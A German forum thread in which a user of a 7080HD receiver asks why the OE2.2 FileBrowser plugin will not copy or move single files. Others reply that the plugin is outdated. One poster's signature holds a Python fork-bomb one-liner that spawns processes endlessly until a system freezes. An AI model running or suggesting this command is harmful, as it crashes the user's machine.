newnigma2 FileBrowser (OE2.2)

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • newnigma2 FileBrowser (OE2.2)

      Hallo,
      ich habe eine Frage zu dem Filebrowser. Wie kann ich mit dem Filebrowser eine Datei kopieren? ?(
      Das Prinzip mit den zwei Fenstern kenne ich noch von den alten Zeiten mit dem NortonCommander unter DOS. Die markierten Dateien im aktivierten Fenster wurden durch Drücken der Taste KOPIEREN (F5) ins andere Fenster kopiert.
      Die Oberfläche des FileBrowsers sieht doch ähnlich aus. Mit der gelben Taste soll "Kopieren" möglich sein. Aber ich bekomme es einfach nicht hin.
      Meine Vorgehensweise:
      das rechte Fenster soll mein Ziel sein. Also navigiere ich zu dem leeren Zielordner und öffne ihn in der rechten Listbox. Durch Drücken der "<" Taste wechsel ich zur linken Listbox und "wähle" mit der "nach unten Taste" die zu kopierende Datei aus (der braungelbe Balken befindet sich auf der Datei). Dann drücke ich die gelbe Taste (für Kopieren) und nichts passiert. Das einzige was passiert, beide braungelbe Balken springen nach ganz oben auf den Pfeil "nach links".
      Aus Verzweiflung habe ich die grüne Taste "Verschieben" auch mal ausprobiert. Hier passiert das gleiche. Keine Datei-Aktion; nur beide braungelbe Balken springen nach oben. Bei der roten Taste "Löschen" wird die Datei gelöscht. FUNKTIONIERT. Das Umbenennen/ Verzeichnis erstellen und das Zippen funktioniert auch. Nur kopieren oder verschieben bekomme ich zum verrecken nicht hin.
      Auch die eingebaute Hilfe über die HELP Taste bringt mich nicht weiter.
      Ich wäre echt für eure Aufklärung dankbar.
      Die Box ist eine 7080HD mit dem aktuellen weekly OE2.2.
      Im Moment löse ich das Problem, indem ich mit Filezilla die Dateien aus dem Quellordner auf dem PC kopiere und im zweiten Schritt die Dateien vom PC in den Zielordner kopiere.
    • Habe etwas herausgefunden:

      - alle Dateien (Filme.ts oder die vielen kleineren Dateien) lassen sich aus dem movie-Ordner NICHT kopieren.
      - nur der gesamte movie-Ordner lässt sich kopieren
      - alle Dateien aus anderen Ordnern lassen sich verschieben oder kopieren

      Somit ist der Filebrowser für die Aufgabe "mal eben einen Film von der internen Platte auf einen über USB-Anschluß angedockten Datenträger zu schieben" nicht zu gebrauchen. :down:
    • Leute dieses Plugin ist im OE 2.2 total veraltet und da wird auch nichts mehr gemacht.Also entweder ihr nehmt OE2.5 und damit einen neueren Filebrowser und der kann sehr wohl einzelne dateien kopieren oder ihr lasst es aber keine verurteilung eines Plugins das ihr in völlig veralterter form benutzt.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hallo,
      vielen Dank für die Wortmeldungen. :)

      @kati910: ich würde im Leben keine Verurteilung des Plugin machen. Mein Beitrag sollte nur den Funktionsumfang des Plugins auf meiner Box wiedergeben. Und so verhält sich das Plugin nun mal auf meiner Box.
      Die Dateien lassen sich sehr wohl einzeln kopieren, nur eben nicht die aus dem movie-Ordner. An den Dateiattributen liegt es nicht. Das habe ich mit Filezilla nach gesehen. Aber mehr Verstand habe ich als reiner Fernbedienungs-User und Windows-User nun mal nicht.

      Bevor der Beitrag missverstanden wird:
      Ich habe vor jedem Plugin-Schreiber eine Menge Respekt und bin allen für die Arbeit dankbar, die sie in ihre Projekte reinstecken.
      :blumen2: DANKE